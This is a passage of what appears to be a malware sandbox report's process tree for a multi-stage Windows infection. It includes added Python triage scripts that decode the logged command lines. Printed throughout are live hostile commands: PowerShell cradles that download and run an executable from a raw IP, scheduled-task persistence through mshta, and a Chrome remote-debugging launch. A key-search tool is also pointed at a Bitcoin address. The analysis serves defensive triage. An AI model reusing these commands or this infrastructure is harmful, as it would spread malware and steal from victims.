- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Users\Admin\AppData\Local\Temp\10155390101\cuFIzyH.exe"C:\Users\Admin\AppData\Local\Temp\10155390101\cuFIzyH.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2480 -s 12527⤵
- Loads dropped DLL
- Program crash
PID:1416
C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"C:\Users\Admin\AppData\Local\Temp\10163150101\iZ73hNr.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3004 -s 10368⤵
- Loads dropped DLL
- Program crash
PID:2472
C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2264 -
C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"C:\Users\Admin\AppData\Local\Temp\10163520101\P2SXMuh.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:2616
C:\Users\Admin\AppData\Local\Temp\10166360101\0uzaP1a.exe"C:\Users\Admin\AppData\Local\Temp\10166360101\0uzaP1a.exe"6⤵
- Executes dropped EXE
PID:2992 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\pack82.vbe"7⤵
- Blocklisted process makes network request
- Downloads MZ/PE file
- Loads dropped DLL
PID:2948 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /ru system /tn Microsoft\Windows\Shell\WindowsObjectChecking /sc onstart /tr "C:\Users\Admin\AppData\Roaming\F8617F1F15E53ADE2CC7B01D00F844AC\BE4CE3E771FFA0AFA6B3CA61DF9F4514.vbe" /f /rl highest8⤵
- Scheduled Task/Job: Scheduled Task
PID:2252
C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif"C:\Users\Admin\AppData\Local\Temp\System.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\Security Protection Windows.pif" 95.168.166.227:8082:admin:12r3sa6qf98⤵
- Executes dropped EXE
PID:1092 -
C:\Windows\system32\cmd.execmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAD6A3A1A21978000:00000000000000000000000000000000000000000000001CAD6A3DBD742BBFFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"9⤵
- Loads dropped DLL
PID:2032 -
C:\Users\Admin\AppData\Local\Temp\OpenCL.pifOpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAD6A3A1A21978000:00000000000000000000000000000000000000000000001CAD6A3DBD742BBFFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG10⤵
- Executes dropped EXE
PID:2292
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
C:\Windows\system32\cmd.execmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAE6B251EF52B4000:00000000000000000000000000000000000000000000001CAE6B28C247BF7FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"9⤵
- Loads dropped DLL
PID:584 -
C:\Users\Admin\AppData\Local\Temp\OpenCL.pifOpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAE6B251EF52B4000:00000000000000000000000000000000000000000000001CAE6B28C247BF7FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG10⤵
- Executes dropped EXE
PID:1120
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100
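The OpenCL.pif command lines under "Security Protection Windows.pif" have a recognisable shape: --keyspace START:END in hex, a target Bitcoin address, -c (compressed keys), --continue save.txt for resumption and -b/-t/-p GPU work-sizing flags. This matches the command-line syntax of BitCrack-style GPU private-key search tools; the trailing 2>&1 | powershell ... Add-Content keyc.txt keeps only the last nine lines of output, where such tools print a found key. That reading is interpretation, not something the report states. The Python below is an added analysis example, not part of the report; it decodes such command lines to show what this host was asked to search. Both ranges here are equal-sized, non-overlapping slices of the same 69-bit interval, which is what work handed out in slices looks like. The sample lines are copied from the tree; describe_keyspace, sharding_report and their field names are this example's own.

```python
import re

# Sample input copied from the process tree: the two cmd.exe lines that run
# OpenCL.pif and pipe its output into PowerShell.
SAMPLE_CMDLINES = [
    r'cmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAD6A3A1A21978000:00000000000000000000000000000000000000000000001CAD6A3DBD742BBFFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"',
    r'cmd.exe /c OpenCL.pif -c --continue save.txt --keyspace 00000000000000000000000000000000000000000000001CAE6B251EF52B4000:00000000000000000000000000000000000000000000001CAE6B28C247BF7FFF -b 0 -t 0 -p 0 19vkiEajfhuZ8bs8Zu2jgmC6oqZbWqhxhG 2>&1 | powershell -Command "$input | Select-Object -Last 9 | Add-Content keyc.txt"',
]

KEYSPACE_RE = re.compile(r'--keyspace\s+([0-9a-fA-F]+):([0-9a-fA-F]+)')
CONTINUE_RE = re.compile(r'--continue\s+(\S+)')
SINK_RE = re.compile(r'Add-Content\s+"?([^\s"]+)', re.IGNORECASE)
# A legacy (P2PKH) Bitcoin address: leading '1', then 25-34 base58 characters.
# Alphabet and length only; no checksum is verified here.
ADDRESS_RE = re.compile(r'(?<![\w.\\])1[1-9A-HJ-NP-Za-km-z]{25,34}(?![\w.])')

# Group order n of secp256k1: a valid private key is an integer in [1, n-1].
SECP256K1_ORDER = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141


def describe_keyspace(cmdline: str) -> dict:
    """Decode --keyspace START:END plus the flags around it into facts an analyst can reason about."""
    m = KEYSPACE_RE.search(cmdline)
    if not m:
        raise ValueError("no --keyspace argument")
    start, end = int(m.group(1), 16), int(m.group(2), 16)
    if not 0 < start <= end < SECP256K1_ORDER:
        raise ValueError("bounds are not a valid secp256k1 private-key interval")
    addr, cont, sink = ADDRESS_RE.search(cmdline), CONTINUE_RE.search(cmdline), SINK_RE.search(cmdline)
    keys = end - start + 1                       # inclusive range
    return {
        "start": start,
        "end": end,
        "keys": keys,
        "range_bits": end.bit_length(),          # both bounds lie in [2**(b-1), 2**b) when equal for start and end
        "slice_bits": keys.bit_length(),         # this host searches roughly 2**slice_bits keys
        "target": addr.group(0) if addr else None,
        "compressed_keys": " -c " in cmdline,
        "resume_file": cont.group(1) if cont else None,
        "output_sink": sink.group(1) if sink else None,
    }


def sharding_report(cmdlines) -> dict:
    """Compare several slices: same target, same size, no overlap, same power-of-two interval."""
    slices = sorted((describe_keyspace(c) for c in cmdlines), key=lambda s: s["start"])
    return {
        "slices": len(slices),
        "same_target": len({s["target"] for s in slices}) == 1,
        "equal_size": len({s["keys"] for s in slices}) == 1,
        "disjoint": all(a["end"] < b["start"] for a, b in zip(slices, slices[1:])),
        "same_interval": len({s["range_bits"] for s in slices}) == 1,
        "range_bits": slices[0]["range_bits"],
        "slice_bits": slices[0]["slice_bits"],
    }


if __name__ == "__main__":
    for s in map(describe_keyspace, SAMPLE_CMDLINES):
        print(f"{s['start']:#x}..{s['end']:#x}: ~2^{s['slice_bits']} keys inside a "
              f"{s['range_bits']}-bit interval, target {s['target']}, output appended to {s['output_sink']}")
    print(sharding_report(SAMPLE_CMDLINES))
```

For triage the useful facts are the size of the slice (about 2^42 keys per command here, i.e. hours of GPU time rather than seconds, which explains why a persistent launcher is needed), the shared target address, and the keyc.txt sink, which is the file to look for on affected hosts.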
C:\Users\Admin\AppData\Local\Temp\10167640101\db7e2fd40a.exe"C:\Users\Admin\AppData\Local\Temp\10167640101\db7e2fd40a.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2276 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn XICzGmanQz7 /tr "mshta C:\Users\Admin\AppData\Local\Temp\sUnW4PXk7.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:912 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn XICzGmanQz7 /tr "mshta C:\Users\Admin\AppData\Local\Temp\sUnW4PXk7.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1684
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\sUnW4PXk7.hta7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1356 -
C:\Users\Admin\AppData\Local\TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE"C:\Users\Admin\AppData\Local\TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:352
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10167650121\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:2264 -
C:\Windows\SysWOW64\timeout.exetimeout /t 27⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2748
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2648 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2996
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- System Location Discovery: System Language Discovery
PID:2652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "6ycUEmagtJO" /tr "mshta \"C:\Temp\NUnXI0p8x.hta\"" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2208
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\NUnXI0p8x.hta"7⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2200 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2072 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1960
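Every mshta stage in this tree runs the same PowerShell download cradle: $d=$env:temp+'<name>';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;. In two of the three instances the string appended to $env:temp has no leading backslash, so the payload is written to ...\AppData\Local\TempPOFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE and ...\AppData\Local\TempDQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE beside the Temp folder rather than inside it, which is exactly the path the process tree shows for those children; the third instance ('\483d2fa8a0d53818306efeb32d3.exe') gets the separator right. The Python below is an added triage example, not part of the report or of the sample: it extracts the URL and destination from such cradles and reproduces PowerShell's string concatenation to predict where the file lands, which is what you need to collect the payload from a host. The three cradles are copied from the tree; TEMP_DIR and the function and field names are this example's own assumptions.

```python
import re
from urllib.parse import urlsplit

# Sample input copied from the process tree: the three PowerShell cradles as
# mshta.exe spawned them.
SAMPLE_CRADLES = [
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'POFIASQDMJONBGQWDRYXFJCJ7REALHWC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;''',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DQ2UG0HKORTWXTYP2QWQYOV9E9RWJIHS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;''',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;''',
]

# Assumed value of %TEMP% for the sandbox user (the report shows C:\Users\Admin).
TEMP_DIR = r'C:\Users\Admin\AppData\Local\Temp'

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*\$env:(\w+)\s*\+\s*'([^']*)'", re.IGNORECASE)
DOWNLOAD_RE = re.compile(r"\.DownloadFile\(\s*'([^']+)'\s*,\s*\$(\w+)\s*\)", re.IGNORECASE)
START_RE = re.compile(r"Start-Process\s+\$(\w+)", re.IGNORECASE)


def parse_cradle(cmdline: str, env: dict) -> dict:
    """Pull URL, destination and predicted on-disk path out of a $env-based WebClient download cradle."""
    assign, download = ASSIGN_RE.search(cmdline), DOWNLOAD_RE.search(cmdline)
    if not (assign and download):
        raise ValueError("not a $env-based WebClient cradle")
    var, env_name, suffix = assign.groups()
    url, dest_var = download.groups()
    if dest_var != var:
        raise ValueError("DownloadFile destination is not the assembled path")
    base = env[env_name.lower()]
    predicted = base + suffix                    # PowerShell '+' on strings inserts no separator
    inside_temp = predicted.lower().startswith(base.lower() + "\\")
    host = urlsplit(url).hostname or ""
    started = START_RE.search(cmdline)
    return {
        "url": url,
        "cleartext_http": url.lower().startswith("http://"),
        "raw_ip_host": re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host) is not None,
        "predicted_path": predicted,
        "inside_temp": inside_temp,              # False means the file sits next to Temp, not in it
        "executes_download": started is not None and started.group(1) == var,
        "hidden_window": "-windowstyle hidden" in cmdline.lower(),
    }


def indicators(cmdlines, env) -> dict:
    """Deduplicated hunting artefacts: URLs to block and paths to collect from hosts."""
    parsed = [parse_cradle(c, env) for c in cmdlines]
    return {
        "urls": sorted({p["url"] for p in parsed}),
        "paths": [p["predicted_path"] for p in parsed],
        "misplaced_drops": [p["predicted_path"] for p in parsed if not p["inside_temp"]],
    }


if __name__ == "__main__":
    env = {"temp": TEMP_DIR}
    for cradle in SAMPLE_CRADLES:
        print(parse_cradle(cradle, env))
    print(indicators(SAMPLE_CRADLES, env))
```

The misplaced drops matter for collection and for detection: a file-creation rule scoped to the Temp directory itself misses a payload written to its parent directory with a "Temp"-prefixed name, so match on the download cradle (WindowStyle Hidden, WebClient.DownloadFile to a raw-IP http URL, Start-Process of the same variable) rather than on the destination folder.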
C:\Users\Admin\AppData\Local\Temp\10168010101\27264e0632.exe"C:\Users\Admin\AppData\Local\Temp\10168010101\27264e0632.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1696 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1696 -s 12007⤵
- Loads dropped DLL
- Program crash
PID:2172
C:\Users\Admin\AppData\Local\Temp\10168020101\0dce80a750.exe"C:\Users\Admin\AppData\Local\Temp\10168020101\0dce80a750.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:3044 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1956 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef7309758,0x7fef7309768,0x7fef73097788⤵
PID:2716
C:\Windows\system32\ctfmon.exectfmon.exe8⤵
PID:2040
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1136 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:28⤵
PID:2304
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:88⤵
PID:1888
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1600 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:88⤵
PID:2348
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2144 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:2700
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2436 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:972
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2444 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:2504
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1136 --field-trial-handle=1364,i,16848059546333738483,6644215296105860098,131072 /prefetch:28⤵
PID:2124
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3536 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef59e9758,0x7fef59e9768,0x7fef59e97788⤵
PID:3548
C:\Windows\system32\ctfmon.exectfmon.exe8⤵
PID:3660
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1212 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:28⤵
PID:3712
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1460 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:88⤵
PID:3728
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1620 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:88⤵
PID:3796
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2308 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:3812
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2532 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:3924
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --remote-debugging-port=9229 --disable-databases --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2540 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:18⤵
- Uses browser remote debugging
PID:3932
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1588 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:28⤵
PID:3644
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3868 --field-trial-handle=1340,i,6819977066042069984,3209097659862637628,131072 /prefetch:88⤵
PID:3480
